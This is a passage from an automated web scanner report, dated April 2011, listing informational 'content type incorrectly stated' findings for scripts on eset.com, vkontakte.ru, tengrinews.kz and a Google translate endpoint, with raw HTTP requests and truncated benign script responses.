*T_....._R...*8\.......vsY:RL.8.xl|HV$#K...._P4JtULk.HA....QG.ao....kj<8_.l_..t.xm$.A.OC@$@...sK[.SL.m].xy|x..B=....mo..y$-CCj|:@.`T$0WTW|.l_ro....,Bjq9C|Rd....UJ....y|.aj....lnd(4....
...[SNIP]...

33.57. http://tengrinews.kz/static/js/remainNY.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://tengrinews.kz
Path:   /static/js/remainNY.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /static/js/remainNY.js HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
Referer: http://tengrinews.kz/tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2s711rqep5c965kp1duse9cev3; sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229d0d0366c112938578e0493b8d3e9f0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303741246%22%3B%7Dff90da2a04be034fcd1d0a9e7c69a191

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:36:39 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Fri, 21 Jan 2011 05:16:16 GMT
ETag: "be139-6c8-49a54597ae800"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1736

function newYearIn()
{
var days=" ........ "
var now = new Date();
var newYear = new Date("Jan,30,2011,00:00:00");
var totalRemains = (newYear.getTime()-now.getTime());
if (t
...[SNIP]...

33.58. http://translate.googleapis.com/translate_a/t  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
Origin: http://webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 4036

q=%3Ca%20i%3D0%3E%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%3C%2Fa%3E%3Ca%20i%3D1%3E%D0%9D%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8%3C%2Fa%3E%3Ca%20i%3D2%3E%D0%90%D0%B2%D1%82%D0%BE%3C%2Fa%3E%3Ca%20i%3D3%3E%D0%9A%D0%B8
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:48:55 GMT
Expires: Mon, 25 Apr 2011 14:48:55 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=5273502baf452368:TM=1303742935:LM=1303742935:S=EXx_U-Oas8EoHHIY; expires=Wed, 24-Apr-2013 14:48:55 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1713

["\x3ca i=0\x3eSearch\x3c/a\x3e \x3ca i=1\x3eNews\x3c/a\x3e \x3ca i=2\x3eAuto\x3c/a\x3e \x3ca i=3\x3eMovies\x3c/a\x3e \x3ca i=4\x3eWeather\x3c/a\x3e \x3ca i=5\x3eGames\x3c/a\x3e","My Page","All Ads","
...[SNIP]...

33.59. http://vkontakte.ru/js/lang0_0.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vkontakte.ru
Path:   /js/lang0_0.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/lang0_0.js?3340 HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
Referer: http://vkontakte.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: remixchk=5

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:23:41 GMT
Content-Type: text/javascript; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny4
Cache-Control: max-age=604800
Vary: Accept-Encoding
Expires: Mon, 02 May 2011 14:23:41 GMT
Content-Length: 52089

try{stManager.done('lang0_0.js');}catch(e){}
Aboutme='. ....:';
Acad_status='......:';
Acad_status_bach='....... (........)';
Acad_status_bach_fm='......... (........)';
Acad_status_ent='..........';

...[SNIP]...

33.60. http://www.eset.com/us/scripts/business.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/business.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/business.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965301
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 2557

var ESET_Business = {
init: function() {
// check for product dropdowns
if($('business_dropdown_eav')) {
this.setProductDropdown('eav');
}
if($('business_dropdown_eavmac'
...[SNIP]...

33.61. http://www.eset.com/us/scripts/common.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/common.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/common.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B; mbox=PC#1303736347554-914602.17#1304952755|check#true#1303743215|session#1303743154006-383984#1303745015

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 14:52:23 GMT
X-Varnish: 555585940
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 934

var Common = {};

Common.Ticker = new Class({
Implements: Options,
options: {
items: [],
link_id: 'ticker-link',
duration: 4000
},

initialize: function(id, options) {

...[SNIP]...

33.62. http://www.eset.com/us/scripts/elqNow/elqCfg.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/elqNow/elqCfg.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/elqNow/elqCfg.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965312
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 3070

//------------------------------------------------------
// Copyright Eloqua Corporation.
//
var elqSiteID = '2208';
var elqVer = 'v200';
//
var elqERoot = 'now.eloqua.com/';
var elqSecERoot =
...[SNIP]...

33.63. http://www.eset.com/us/scripts/elqNow/elqImg.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/elqNow/elqImg.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/elqNow/elqImg.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965309
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 894

// Copyright Eloqua Corporation.
var elqWDt = new Date(20020101);
var elqDt = new Date();
var elqMs = elqDt.getMilliseconds();
var elqTzo = elqWDt.getTimezoneOffset();
var elqRef2 = '';
if (type
...[SNIP]...

33.64. http://www.eset.com/us/scripts/lib/autocompleter/Autocompleter.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/autocompleter/Autocompleter.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/autocompleter/Autocompleter.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965305
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 10881

var Observer=new Class({Implements:[Options,Events],options:{periodical:false,delay:1000},initialize:function(c,a,b){this.element=$(c)||$$(c);this.addEvent("onFired",a);this.setOptions(b);this.bound=t
...[SNIP]...

33.65. http://www.eset.com/us/scripts/lib/jq-promo-lib.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/jq-promo-lib.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/jq-promo-lib.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B; mbox=check#true#1303736408|session#1303736347554-914602#1303738208

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:58:57 GMT
X-Varnish: 1310978029
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 154

var j = jQuery.noConflict();

j(document).ready(function(){
   j('.promoRadio').click(function(){
       j('.promocode').val(j(this).attr('alt'));
   });
});

33.66. http://www.eset.com/us/scripts/lib/jq.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/jq.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/jq.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B; mbox=check#true#1303736408|session#1303736347554-914602#1303738208

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:58:57 GMT
X-Varnish: 1310978027
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 78768

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Incl
...[SNIP]...

33.67. http://www.eset.com/us/scripts/lib/mbox.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/mbox.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/mbox.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977886
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 20200

var mboxCopyright = "&copy; 1996-2008. Omniture, Inc. All rights reserved.";mboxUrlBuilder = function(a, b) { this.a = a; this.b = b; this.c = new Array(); this.d = function(e) { return e; }; this.f =
...[SNIP]...

33.68. http://www.eset.com/us/scripts/lib/mootools-1.2.3-core-yc.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/mootools-1.2.3-core-yc.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/mootools-1.2.3-core-yc.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:45 GMT
X-Varnish: 1310965283
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 66610

//MooTools, <http://mootools.net>, My Object Oriented (JavaScript) Tools. Copyright (c) 2006-2009 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools={version:"1.2.3",build:"4980
...[SNIP]...

33.69. http://www.eset.com/us/scripts/lib/s_code3.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/lib/s_code3.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/lib/s_code3.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965306
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 80333


/* SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES ***********
...[SNIP]...

33.70. http://www.eset.com/us/scripts/store.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eset.com
Path:   /us/scripts/store.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/store.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
